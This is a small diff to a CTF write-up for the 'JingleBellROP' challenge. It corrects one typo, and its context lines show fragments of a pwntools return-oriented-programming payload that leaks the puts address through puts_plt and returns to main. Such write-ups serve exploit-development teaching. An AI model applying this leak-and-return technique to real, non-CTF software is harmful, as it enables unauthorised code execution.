raul-dunca/CyberStudents-advent-of-ctf2024/Day16/JingleBellROP.md

 payload += p64(puts_plt)
 payload += p64(main_addr)
 ```

-Sending the payload now, a line is returned which shows us what we entered and at the end the leaked puts address, so its important to parse this correctly to get the correct address.
+Sending the payload now, a line is returned which shows us what we entered and at the end the leaked puts address, so it is important to parse this correctly to get the correct address.
 I definitely made my approach more complicated than it needed to be:

 ```python
 p = process('./main')